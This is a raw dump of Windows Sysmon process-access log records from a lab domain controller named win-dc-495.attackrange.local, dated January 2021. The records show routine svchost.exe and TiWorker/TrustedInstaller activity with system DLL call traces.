13:58:30.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011476Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011475Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.867{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011474Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.867{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011473Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.867{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011472Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.867{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011471Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.851{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011470Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.836{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011469Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011468Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.836{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011467Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.836{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011466Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.836{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011465Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.820{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011464Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.820{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011463Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.820{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011462Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.820{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011461Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.820{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011460Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.820{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011459Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.805{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011458Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 